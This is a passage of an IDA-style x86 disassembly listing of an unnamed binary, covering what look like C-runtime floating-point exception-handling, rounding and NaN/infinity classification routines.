mov dword ptr [edi+4], 0F1h
jmp short loc_419E7A
; ---------------------------------------------------------------------------
loc_419E1A: ; CODE XREF: sub_419DE0+26�j
jnb short loc_419E81
mov eax, [ebp+arg_C]
lea esi, [edx+eax]
lea eax, [ebx+0F8h]
cmp eax, esi
jb short loc_419E81
lea eax, [ecx+edx]
loc_419E2F: ; CODE XREF: sub_419DE0+59�j
cmp eax, esi
jnb short loc_419E3D
cmp byte ptr [eax], 0
jnz short loc_419E3B
inc eax
jmp short loc_419E2F
; ---------------------------------------------------------------------------
loc_419E3B: ; CODE XREF: sub_419DE0+56�j
cmp eax, esi
loc_419E3D: ; CODE XREF: sub_419DE0+51�j
jnz short loc_419E81
mov al, byte ptr [ebp+arg_C]
mov [edx], al
mov eax, [ebx]
cmp edx, eax
ja short loc_419E75
cmp esi, eax
jbe short loc_419E75
lea eax, [ebx+0F8h]
cmp esi, eax
jnb short loc_419E6C
xor eax, eax
mov [ebx], esi
cmp [esi], al
jnz short loc_419E67
loc_419E60: ; CODE XREF: sub_419DE0+85�j
inc eax
cmp byte ptr [esi+eax], 0
jz short loc_419E60
loc_419E67: ; CODE XREF: sub_419DE0+7E�j
mov [ebx+4], eax
jmp short loc_419E75
; ---------------------------------------------------------------------------
loc_419E6C: ; CODE XREF: sub_419DE0+76�j
and dword ptr [ebx+4], 0
lea eax, [ebx+8]
mov [ebx], eax
loc_419E75: ; CODE XREF: sub_419DE0+68�j
; sub_419DE0+6C�j ...
sub ecx, [ebp+arg_C]
add [edi], ecx
loc_419E7A: ; CODE XREF: sub_419DE0+38�j
mov [ebp+var_4], 1
loc_419E81: ; CODE XREF: sub_419DE0:loc_419E1A�j
; sub_419DE0+4A�j ...
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_419DE0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __fastcall sub_419E89(int,int,double,int)
sub_419E89 proc near ; CODE XREF: sub_415D04+51�p
; sub_415E4B+51�p
var_1C = qword ptr -1Ch
var_14 = qword ptr -14h
var_C = qword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp dword_43AD88, 0
jnz short loc_419EBE
push [ebp+arg_C] ; int
fld qword ptr [ebp+arg_4]
push ecx
push ecx ; double
fstp [esp+0Ch+var_C]
push ecx ; int
push ecx ; int
fldz
fstp [esp+14h+var_14]
fld qword ptr [ebp+arg_4]
push ecx ; int
push ecx ; int
fstp [esp+1Ch+var_1C]
push [ebp+arg_0] ; int
push 1 ; int
call sub_41A43E
add esp, 24h
pop ebp
retn
; ---------------------------------------------------------------------------
loc_419EBE: ; CODE XREF: sub_419E89+A�j
push 0FFFFh
mov dword_46BB04, 21h
push [ebp+arg_C]
call sub_41A6B1
fld qword ptr [ebp+arg_4]
pop ecx
pop ecx
pop ebp
retn
sub_419E89 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_419EDC(int,int,double,double,int)
sub_419EDC proc near ; CODE XREF: sub_415D04:loc_415DC7�p
; sub_415E4B:loc_415F0E�p
var_74 = qword ptr -74h
var_6C = qword ptr -6Ch
var_64 = qword ptr -64h
var_5C = dword ptr -5Ch
var_58 = byte ptr -58h
var_20 = dword ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = qword ptr 10h
arg_10 = qword ptr 18h
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 58h
push [ebp+arg_18]
lea eax, [ebp+arg_10]
push eax
push [ebp+arg_0]
call sub_41A227
add esp, 0Ch
test eax, eax
jnz short loc_419F1A
lea eax, [ebp+arg_10]
and [ebp+var_20], 0FFFFFFFEh
push eax
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+arg_18]
push [ebp+arg_4]
push [ebp+arg_0]
push eax
lea eax, [ebp+var_58]
push eax
call sub_419F74
add esp, 18h
loc_419F1A: ; CODE XREF: sub_419EDC+1A�j
push [ebp+arg_0]
call sub_41A511
cmp dword_43AD88, 0
pop ecx
jnz short loc_419F58
test eax, eax
jz short loc_419F58
push [ebp+arg_18] ; int
fld [ebp+arg_10]
push ecx
push ecx ; double
fstp [esp+64h+var_64]
push ecx ; int
push ecx ; int
fldz
fstp [esp+6Ch+var_6C]
fld [ebp+arg_8]
push ecx ; int
push ecx ; int
fstp [esp+74h+var_74]
push [ebp+arg_4] ; int
push eax ; int
call sub_41A43E
add esp, 24h
leave
retn
; ---------------------------------------------------------------------------
loc_419F58: ; CODE XREF: sub_419EDC+4E�j
; sub_419EDC+52�j
push eax
call sub_41A4C6
mov [esp+5Ch+var_5C], 0FFFFh
push [ebp+arg_18]
call sub_41A6B1
fld [ebp+arg_10]
pop ecx
pop ecx
leave
retn
sub_419EDC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419F74 proc near ; CODE XREF: sub_419EDC+36�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
mov ecx, [ebp+arg_0]
xor eax, eax
push ebx
push esi
mov [ecx+4], eax
mov ecx, [ebp+arg_0]
push edi
push 1
mov [ecx+8], eax
mov ecx, [ebp+arg_0]
pop ebx
mov [ecx+0Ch], eax
mov cl, byte ptr [ebp+arg_8]
test cl, 10h
jz short loc_419FA6
mov eax, [ebp+arg_0]
mov [ebp+arg_8], 0C000008Fh
or [eax+4], ebx
loc_419FA6: ; CODE XREF: sub_419F74+23�j
test cl, 2
jz short loc_419FB9
mov eax, [ebp+arg_0]
mov [ebp+arg_8], 0C0000093h
or dword ptr [eax+4], 2
loc_419FB9: ; CODE XREF: sub_419F74+35�j
test cl, bl
jz short loc_419FCB
mov eax, [ebp+arg_0]
mov [ebp+arg_8], 0C0000091h
or dword ptr [eax+4], 4
loc_419FCB: ; CODE XREF: sub_419F74+47�j
test cl, 4
jz short loc_419FDE
mov eax, [ebp+arg_0]
mov [ebp+arg_8], 0C000008Eh
or dword ptr [eax+4], 8
loc_419FDE: ; CODE XREF: sub_419F74+5A�j
test cl, 8
jz short loc_419FF1
mov eax, [ebp+arg_0]
mov [ebp+arg_8], 0C0000090h
or dword ptr [eax+4], 10h
loc_419FF1: ; CODE XREF: sub_419F74+6D�j
mov esi, [ebp+arg_4]
mov eax, [ebp+arg_0]
push 2
mov ecx, [esi]
mov edx, [eax+8]
not ecx
and ecx, ebx
and edx, 0FFFFFFEFh
shl ecx, 4
or ecx, edx
pop edi
mov [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
not ecx
mov edx, [eax+8]
and ecx, 4
shl ecx, 1
and edx, 0FFFFFFF7h
or ecx, edx
mov [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
not ecx
mov edx, [eax+8]
shr ecx, 1
and ecx, 4
and edx, 0FFFFFFFBh
or ecx, edx
mov [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
not ecx
mov edx, [eax+8]
shr ecx, 3
and ecx, edi
and edx, 0FFFFFFFDh
or ecx, edx
mov [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
not ecx
mov edx, [eax+8]
shr ecx, 5
and ecx, ebx
and edx, 0FFFFFFFEh
or ecx, edx
mov [eax+8], ecx
call sub_41A694
test al, bl
jz short loc_41A07A
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 10h
loc_41A07A: ; CODE XREF: sub_419F74+FD�j
test al, 4
jz short loc_41A085
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 8
loc_41A085: ; CODE XREF: sub_419F74+108�j
test al, 8
jz short loc_41A090
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 4
loc_41A090: ; CODE XREF: sub_419F74+113�j
test al, 10h
jz short loc_41A09A
mov ecx, [ebp+arg_0]
or [ecx+0Ch], edi
loc_41A09A: ; CODE XREF: sub_419F74+11E�j
test al, 20h
jz short loc_41A0A4
mov eax, [ebp+arg_0]
or [eax+0Ch], ebx
loc_41A0A4: ; CODE XREF: sub_419F74+128�j
mov eax, [esi]
mov ecx, 0C00h
and eax, ecx
jz short loc_41A0E3
cmp eax, 400h
jz short loc_41A0D5
cmp eax, 800h
jz short loc_41A0C9
cmp eax, ecx
jnz short loc_41A0E9
mov eax, [ebp+arg_0]
or dword ptr [eax], 3
jmp short loc_41A0E9
; ---------------------------------------------------------------------------
loc_41A0C9: ; CODE XREF: sub_419F74+147�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFFEh
or ecx, edi
jmp short loc_41A0DF
; ---------------------------------------------------------------------------
loc_41A0D5: ; CODE XREF: sub_419F74+140�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFFDh
or ecx, ebx
loc_41A0DF: ; CODE XREF: sub_419F74+15F�j
mov [eax], ecx
jmp short loc_41A0E9
; ---------------------------------------------------------------------------
loc_41A0E3: ; CODE XREF: sub_419F74+139�j
mov eax, [ebp+arg_0]
and dword ptr [eax], 0FFFFFFFCh
loc_41A0E9: ; CODE XREF: sub_419F74+14B�j
; sub_419F74+153�j ...
mov eax, [esi]
mov ecx, 300h
and eax, ecx
jz short loc_41A114
cmp eax, 200h
jz short loc_41A107
cmp eax, ecx
jnz short loc_41A121
mov eax, [ebp+arg_0]
and dword ptr [eax], 0FFFFFFE3h
jmp short loc_41A121
; ---------------------------------------------------------------------------
loc_41A107: ; CODE XREF: sub_419F74+185�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFE7h
or ecx, 4
jmp short loc_41A11F
; ---------------------------------------------------------------------------
loc_41A114: ; CODE XREF: sub_419F74+17E�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFEBh
or ecx, 8
loc_41A11F: ; CODE XREF: sub_419F74+19E�j
mov [eax], ecx
loc_41A121: ; CODE XREF: sub_419F74+189�j
; sub_419F74+191�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_C]
and ecx, 0FFFh
mov edx, [eax]
shl ecx, 5
and edx, 0FFFE001Fh
or ecx, edx
mov [eax], ecx
mov eax, [ebp+arg_0]
or [eax+20h], ebx
mov eax, [ebp+arg_0]
mov ecx, [eax+20h]
and ecx, 0FFFFFFE3h
or ecx, edi
mov [eax+20h], ecx
mov eax, [ebp+arg_10]
fld qword ptr [eax]
mov eax, [ebp+arg_0]
fstp qword ptr [eax+10h]
mov eax, [ebp+arg_0]
or [eax+50h], ebx
mov eax, [ebp+arg_0]
mov ecx, [eax+50h]
and ecx, 0FFFFFFE3h
or ecx, edi
mov edi, [ebp+arg_14]
mov [eax+50h], ecx
mov eax, [ebp+arg_0]
fld qword ptr [edi]
fstp qword ptr [eax+40h]
call sub_41A6A2
lea eax, [ebp+arg_0]
push eax
push ebx
push 0
push [ebp+arg_8]
call dword_421188 ; RaiseException
mov eax, [ebp+arg_0]
test byte ptr [eax+8], 10h
jz short loc_41A19B
and dword ptr [esi], 0FFFFFFFEh
loc_41A19B: ; CODE XREF: sub_419F74+222�j
test byte ptr [eax+8], 8
jz short loc_41A1A4
and dword ptr [esi], 0FFFFFFFBh
loc_41A1A4: ; CODE XREF: sub_419F74+22B�j
test byte ptr [eax+8], 4
jz short loc_41A1AD
and dword ptr [esi], 0FFFFFFF7h
loc_41A1AD: ; CODE XREF: sub_419F74+234�j
test byte ptr [eax+8], 2
jz short loc_41A1B6
and dword ptr [esi], 0FFFFFFEFh
loc_41A1B6: ; CODE XREF: sub_419F74+23D�j
test [eax+8], bl
jz short loc_41A1BE
and dword ptr [esi], 0FFFFFFDFh
loc_41A1BE: ; CODE XREF: sub_419F74+245�j
mov ecx, [eax]
mov edx, 0FFFFF3FFh
and ecx, 3
sub ecx, 0
jz short loc_41A1F2
dec ecx
jz short loc_41A1E6
dec ecx
jz short loc_41A1DC
dec ecx
jnz short loc_41A1F4
or byte ptr [esi+1], 0Ch
jmp short loc_41A1F4
; ---------------------------------------------------------------------------
loc_41A1DC: ; CODE XREF: sub_419F74+25D�j
mov ecx, [esi]
and ch, 0FBh
or ch, 8
jmp short loc_41A1EE
; ---------------------------------------------------------------------------
loc_41A1E6: ; CODE XREF: sub_419F74+25A�j
mov ecx, [esi]
and ch, 0F7h
or ch, 4
loc_41A1EE: ; CODE XREF: sub_419F74+270�j
mov [esi], ecx
jmp short loc_41A1F4
; ---------------------------------------------------------------------------
loc_41A1F2: ; CODE XREF: sub_419F74+257�j
and [esi], edx
loc_41A1F4: ; CODE XREF: sub_419F74+260�j
; sub_419F74+266�j ...
mov ecx, [eax]
shr ecx, 2
and ecx, 7
sub ecx, 0
jz short loc_41A214
dec ecx
jz short loc_41A20B
dec ecx
jnz short loc_41A21D
and [esi], edx
jmp short loc_41A21D
; ---------------------------------------------------------------------------
loc_41A20B: ; CODE XREF: sub_419F74+28E�j
mov ecx, [esi]
and ecx, edx
or ch, 2
jmp short loc_41A21B
; ---------------------------------------------------------------------------
loc_41A214: ; CODE XREF: sub_419F74+28B�j
mov ecx, [esi]
and ecx, edx
or ch, 3
loc_41A21B: ; CODE XREF: sub_419F74+29E�j
mov [esi], ecx
loc_41A21D: ; CODE XREF: sub_419F74+291�j
; sub_419F74+295�j
fld qword ptr [eax+40h]
fstp qword ptr [edi]
pop edi
pop esi
pop ebx
pop ebp
retn
sub_419F74 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A227 proc near ; CODE XREF: sub_419EDC+10�p
var_24 = qword ptr -24h
var_C = qword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_0]
push ebx
push edi
mov edi, eax
and edi, 1Fh
push 1
test al, 8
pop ebx
jz short loc_41A252
test byte ptr [ebp+arg_8], bl
jz short loc_41A252
push ebx
call sub_41A6D4
pop ecx
and edi, 0FFFFFFF7h
jmp loc_41A41C
; ---------------------------------------------------------------------------
loc_41A252: ; CODE XREF: sub_41A227+15�j
; sub_41A227+1A�j
test al, 4
jz short loc_41A26C
test byte ptr [ebp+arg_8], 4
jz short loc_41A26C
push 4
call sub_41A6D4
pop ecx
and edi, 0FFFFFFFBh
jmp loc_41A41C
; ---------------------------------------------------------------------------
loc_41A26C: ; CODE XREF: sub_41A227+2D�j
; sub_41A227+33�j
test al, bl
jz loc_41A346
test byte ptr [ebp+arg_8], 8
jz loc_41A346
push 8
call sub_41A6D4
pop ecx
mov eax, 0C00h
mov ecx, [ebp+arg_8]
and ecx, eax
jz loc_41A31E
cmp ecx, 400h
jz short loc_41A2F6
cmp ecx, 800h
jz short loc_41A2CE
cmp ecx, eax
jnz loc_41A33E
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp dbl_4217E0
fld dbl_43A720
fnstsw ax
sahf
ja short loc_41A2C6
fchs
loc_41A2C6: ; CODE XREF: sub_41A227+9B�j
fstp [ebp+var_C]
fld [ebp+var_C]
jmp short loc_41A33C
; ---------------------------------------------------------------------------
loc_41A2CE: ; CODE XREF: sub_41A227+7D�j
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp dbl_4217E0
fnstsw ax
sahf
jbe short loc_41A2E6
fld dbl_43A710
jmp short loc_41A2EE
; ---------------------------------------------------------------------------
loc_41A2E6: ; CODE XREF: sub_41A227+B5�j
fld dbl_43A720
fchs
loc_41A2EE: ; CODE XREF: sub_41A227+BD�j
fstp [ebp+var_C]
fld [ebp+var_C]
jmp short loc_41A33C
; ---------------------------------------------------------------------------
loc_41A2F6: ; CODE XREF: sub_41A227+75�j
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp dbl_4217E0
fnstsw ax
sahf
jbe short loc_41A30E
fld dbl_43A720
jmp short loc_41A316
; ---------------------------------------------------------------------------
loc_41A30E: ; CODE XREF: sub_41A227+DD�j
fld dbl_43A710
fchs
loc_41A316: ; CODE XREF: sub_41A227+E5�j
fstp [ebp+var_C]
fld [ebp+var_C]
jmp short loc_41A33C
; ---------------------------------------------------------------------------
loc_41A31E: ; CODE XREF: sub_41A227+69�j
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp dbl_4217E0
fld dbl_43A710
fnstsw ax
sahf
ja short loc_41A336
fchs
loc_41A336: ; CODE XREF: sub_41A227+10B�j
fstp [ebp+var_C]
fld [ebp+var_C]
loc_41A33C: ; CODE XREF: sub_41A227+A5�j
; sub_41A227+CD�j ...
fstp qword ptr [ecx]
loc_41A33E: ; CODE XREF: sub_41A227+81�j
and edi, 0FFFFFFFEh
jmp loc_41A41C
; ---------------------------------------------------------------------------
loc_41A346: ; CODE XREF: sub_41A227+47�j
; sub_41A227+51�j
test al, 2
jz loc_41A41C
test byte ptr [ebp+arg_8], 10h
jz loc_41A41C
push esi
xor esi, esi
test al, 10h
jz short loc_41A361
mov esi, ebx
loc_41A361: ; CODE XREF: sub_41A227+136�j
mov eax, [ebp+arg_4]
fld qword ptr [eax]
fstp [ebp+var_C]
fld [ebp+var_C]
fcomp dbl_4217E0
fnstsw ax
sahf
jz loc_41A40A
fld [ebp+var_C]
lea eax, [ebp+var_4]
push eax ; int
push ecx
push ecx ; double
fstp [esp+24h+var_24]
call sub_41A5D3
mov eax, [ebp+var_4]
add esp, 0Ch
fstp [ebp+var_C]
lea ecx, [eax-600h]
cmp ecx, 0FFFFFBCEh
jge short loc_41A3AC
fldz
mov esi, ebx
fstp [ebp+var_C]
jmp short loc_41A400
; ---------------------------------------------------------------------------
loc_41A3AC: ; CODE XREF: sub_41A227+17A�j
fld [ebp+var_C]
fcomp dbl_4217E0
fnstsw ax
sahf
jnb short loc_41A3BE
mov edx, ebx
jmp short loc_41A3C0
; ---------------------------------------------------------------------------
loc_41A3BE: ; CODE XREF: sub_41A227+191�j
xor edx, edx
loc_41A3C0: ; CODE XREF: sub_41A227+195�j
mov al, byte ptr [ebp+var_C+6]
and eax, 0Fh
or al, 10h
mov word ptr [ebp+var_C+6], ax
mov eax, 0FFFFFC03h
cmp ecx, eax
jge short loc_41A3F4
sub eax, ecx
loc_41A3D7: ; CODE XREF: sub_41A227+1CB�j
test byte ptr [ebp+var_C], bl
jz short loc_41A3E2
test esi, esi
jnz short loc_41A3E2
mov esi, ebx
loc_41A3E2: ; CODE XREF: sub_41A227+1B3�j
; sub_41A227+1B7�j
shr dword ptr [ebp+var_C], 1
test byte ptr [ebp+var_C+4], bl
jz short loc_41A3EE
or byte ptr [ebp+var_C+3], 80h
loc_41A3EE: ; CODE XREF: sub_41A227+1C1�j
shr dword ptr [ebp+var_C+4], 1
dec eax
jnz short loc_41A3D7
loc_41A3F4: ; CODE XREF: sub_41A227+1AC�j
test edx, edx
jz short loc_41A400
fld [ebp+var_C]
fchs
fstp [ebp+var_C]
loc_41A400: ; CODE XREF: sub_41A227+183�j
; sub_41A227+1CF�j
fld [ebp+var_C]
mov eax, [ebp+arg_4]
fstp qword ptr [eax]
jmp short loc_41A40C
; ---------------------------------------------------------------------------
loc_41A40A: ; CODE XREF: sub_41A227+14E�j
mov esi, ebx
loc_41A40C: ; CODE XREF: sub_41A227+1E1�j
test esi, esi
pop esi
jz short loc_41A419
push 10h
call sub_41A6D4
pop ecx
loc_41A419: ; CODE XREF: sub_41A227+1E8�j
and edi, 0FFFFFFFDh
loc_41A41C: ; CODE XREF: sub_41A227+26�j
; sub_41A227+40�j ...
test byte ptr [ebp+arg_0], 10h
jz short loc_41A433
test byte ptr [ebp+arg_8], 20h
jz short loc_41A433
push 20h
call sub_41A6D4
pop ecx
and edi, 0FFFFFFEFh
loc_41A433: ; CODE XREF: sub_41A227+1F9�j
; sub_41A227+1FF�j
xor eax, eax
test edi, edi
pop edi
pop ebx
setz al
leave
retn
sub_41A227 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41A43E(int,int,int,int,int,int,double,int)
sub_41A43E proc near ; CODE XREF: sub_419E89+2B�p
; sub_419EDC+72�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = qword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = qword ptr 20h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 20h
push [ebp+arg_4]
call sub_41A4EC
test eax, eax
pop ecx
mov [ebp+var_1C], eax
jz short loc_41A4A9
mov eax, [ebp+arg_8]
push esi
mov [ebp+var_18], eax
mov eax, [ebp+arg_C]
mov [ebp+var_14], eax
mov eax, [ebp+arg_10]
mov esi, [ebp+arg_0]
mov [ebp+var_10], eax
mov eax, [ebp+arg_14]
push 0FFFFh
push [ebp+arg_20]
mov [ebp+var_C], eax
mov eax, dword ptr [ebp+arg_18]
mov [ebp+var_20], esi
mov dword ptr [ebp+var_8], eax
mov eax, dword ptr [ebp+arg_18+4]
mov dword ptr [ebp+var_8+4], eax
call sub_41A6B1
lea eax, [ebp+var_20]
push eax
call sub_41E0AF
add esp, 0Ch
test eax, eax
jnz short loc_41A4A3
push esi
call sub_41A4C6
pop ecx
loc_41A4A3: ; CODE XREF: sub_41A43E+5C�j
fld [ebp+var_8]
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_41A4A9: ; CODE XREF: sub_41A43E+14�j
push 0FFFFh
push [ebp+arg_20]
call sub_41A6B1
push [ebp+arg_0]
call sub_41A4C6
fld [ebp+arg_18]
add esp, 0Ch
leave
retn
sub_41A43E endp
; =============== S U B R O U T I N E =======================================
sub_41A4C6 proc near ; CODE XREF: sub_419EDC+7D�p
; sub_41A43E+5F�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, 1
jz short loc_41A4E1
jle short locret_41A4EB
cmp eax, 3
jg short locret_41A4EB
mov dword_46BB04, 22h
retn
; ---------------------------------------------------------------------------
loc_41A4E1: ; CODE XREF: sub_41A4C6+7�j
mov dword_46BB04, 21h
locret_41A4EB: ; CODE XREF: sub_41A4C6+9�j
; sub_41A4C6+E�j
retn
sub_41A4C6 endp
; =============== S U B R O U T I N E =======================================
sub_41A4EC proc near ; CODE XREF: sub_41A43E+9�p
arg_0 = dword ptr 4
xor ecx, ecx
mov eax, offset dword_43A638
loc_41A4F3: ; CODE XREF: sub_41A4EC+18�j
mov edx, [eax]
cmp edx, [esp+arg_0]
jz short loc_41A509
add eax, 8
inc ecx
cmp eax, offset dbl_43A710
jl short loc_41A4F3
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41A509: ; CODE XREF: sub_41A4EC+D�j
mov eax, off_43A63C[ecx*8]
retn
sub_41A4EC endp
; =============== S U B R O U T I N E =======================================
sub_41A511 proc near ; CODE XREF: sub_419EDC+41�p
arg_0 = byte ptr 4
mov al, [esp+arg_0]
test al, 20h
jz short loc_41A51D
push 5
jmp short loc_41A533
; ---------------------------------------------------------------------------
loc_41A51D: ; CODE XREF: sub_41A511+6�j
test al, 8
jz short loc_41A525
push 1
jmp short loc_41A533
; ---------------------------------------------------------------------------
loc_41A525: ; CODE XREF: sub_41A511+E�j
test al, 4
jz short loc_41A52D
push 2
jmp short loc_41A533
; ---------------------------------------------------------------------------
loc_41A52D: ; CODE XREF: sub_41A511+16�j
test al, 1
jz short loc_41A535
push 3
loc_41A533: ; CODE XREF: sub_41A511+A�j
; sub_41A511+12�j ...
pop eax
retn
; ---------------------------------------------------------------------------
loc_41A535: ; CODE XREF: sub_41A511+1E�j
movzx eax, al
and eax, 2
shl eax, 1
retn
sub_41A511 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41A53E(double)
sub_41A53E proc near ; CODE XREF: sub_415D04:loc_415D8A�p
; sub_415E4B:loc_415ED1�p
var_8 = qword ptr -8
arg_0 = qword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
fld [ebp+arg_0]
frndint
fstp [ebp+var_8]
fld [ebp+var_8]
leave
retn
sub_41A53E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41A550(double,int)
sub_41A550 proc near ; CODE XREF: sub_41A5D3+82�p
; sub_41A5D3+98�p
var_8 = qword ptr -8
arg_0 = qword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_8]
mov ecx, [ebp+0Eh]
fld [ebp+arg_0]
add eax, 3FEh
and cx, 800Fh
fstp [ebp+var_8]
shl eax, 4
or eax, ecx
mov word ptr [ebp+var_8+6], ax
fld [ebp+var_8]
leave
retn
sub_41A550 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A579 proc near ; CODE XREF: sub_415D04+31�p
; sub_415E4B+31�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
xor edx, edx
cmp [ebp+arg_4], 7FF00000h
jnz short loc_41A590
cmp [ebp+arg_0], edx
jnz short loc_41A5A2
push 1
jmp short loc_41A5CC
; ---------------------------------------------------------------------------
loc_41A590: ; CODE XREF: sub_41A579+C�j
cmp [ebp+arg_4], 0FFF00000h
jnz short loc_41A5A2
cmp [ebp+arg_0], edx
jnz short loc_41A5A2
push 2
jmp short loc_41A5CC
; ---------------------------------------------------------------------------
loc_41A5A2: ; CODE XREF: sub_41A579+11�j
; sub_41A579+1E�j ...
mov ecx, [ebp+arg_4+2]
mov eax, 7FF8h
and ecx, eax
cmp cx, ax
jnz short loc_41A5B5
push 3
jmp short loc_41A5CC
; ---------------------------------------------------------------------------
loc_41A5B5: ; CODE XREF: sub_41A579+36�j
cmp cx, 7FF0h
jnz short loc_41A5CF
test [ebp+arg_4], 7FFFFh
jnz short loc_41A5CA
cmp [ebp+arg_0], edx
jz short loc_41A5CF
loc_41A5CA: ; CODE XREF: sub_41A579+4A�j
push 4
loc_41A5CC: ; CODE XREF: sub_41A579+15�j
; sub_41A579+27�j ...
pop eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41A5CF: ; CODE XREF: sub_41A579+41�j
; sub_41A579+4F�j
xor eax, eax
pop ebp
retn
sub_41A579 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41A5D3(double,int)
sub_41A5D3 proc near ; CODE XREF: sub_41A227+160�p
var_18 = qword ptr -18h
var_8 = qword ptr -8
arg_0 = qword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
fld [ebp+arg_0]
fcomp dbl_4217E0
push esi
fnstsw ax
sahf
jnz short loc_41A5F3
fldz
xor esi, esi
fstp [ebp+var_8]
jmp loc_41A689
; ---------------------------------------------------------------------------
loc_41A5F3: ; CODE XREF: sub_41A5D3+12�j
xor ecx, ecx
test word ptr [ebp+arg_0+6], 7FF0h
jnz short loc_41A662
test dword ptr [ebp+arg_0+4], 0FFFFFh
jnz short loc_41A60B
cmp dword ptr [ebp+arg_0], ecx
jz short loc_41A662
loc_41A60B: ; CODE XREF: sub_41A5D3+31�j
fld [ebp+arg_0]
fcomp dbl_4217E0
mov esi, 0FFFFFC03h
fnstsw ax
sahf
jnb short loc_41A623
push 1
pop eax
jmp short loc_41A625
; ---------------------------------------------------------------------------
loc_41A623: ; CODE XREF: sub_41A5D3+49�j
xor eax, eax
loc_41A625: ; CODE XREF: sub_41A5D3+4E�j
; sub_41A5D3+69�j
test byte ptr [ebp+arg_0+6], 10h
jnz short loc_41A63E
shl dword ptr [ebp+arg_0+4], 1
test byte ptr [ebp+arg_0+3], 80h
jz short loc_41A638
or dword ptr [ebp+arg_0+4], 1
loc_41A638: ; CODE XREF: sub_41A5D3+5F�j
shl dword ptr [ebp+arg_0], 1
dec esi
jmp short loc_41A625
; ---------------------------------------------------------------------------
loc_41A63E: ; CODE XREF: sub_41A5D3+56�j
and word ptr [ebp+arg_0+6], 0FFEFh
cmp eax, ecx
jz short loc_41A64C
or byte ptr [ebp+arg_0+7], 80h
loc_41A64C: ; CODE XREF: sub_41A5D3+73�j
fld [ebp+arg_0]
push ecx ; int
push ecx
push ecx ; double
fstp [esp+18h+var_18]
call sub_41A550
fstp [ebp+var_8]
add esp, 0Ch
jmp short loc_41A689
; ---------------------------------------------------------------------------
loc_41A662: ; CODE XREF: sub_41A5D3+28�j
; sub_41A5D3+36�j
fld [ebp+arg_0]
push ecx ; int
push ecx
push ecx ; double
fstp [esp+18h+var_18]
call sub_41A550
mov eax, dword ptr [ebp+arg_0+6]
add esp, 0Ch
fstp [ebp+var_8]
shr eax, 4
and ax, 7FFh
movsx esi, ax
sub esi, 3FEh
loc_41A689: ; CODE XREF: sub_41A5D3+1B�j
; sub_41A5D3+8D�j
mov eax, [ebp+arg_8]
fld [ebp+var_8]
mov [eax], esi
pop esi
leave
retn
sub_41A5D3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A694 proc near ; CODE XREF: sub_419F74+F6�p
var_2 = word ptr -2
push ebp
mov ebp, esp
push ecx
fstsw [ebp+var_2]
movsx eax, [ebp+var_2]
leave
retn
sub_41A694 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A6A2 proc near ; CODE XREF: sub_419F74+206�p
var_2 = word ptr -2
push ebp
mov ebp, esp
push ecx
fnstsw [ebp+var_2]
fnclex
movsx eax, [ebp+var_2]
leave
retn
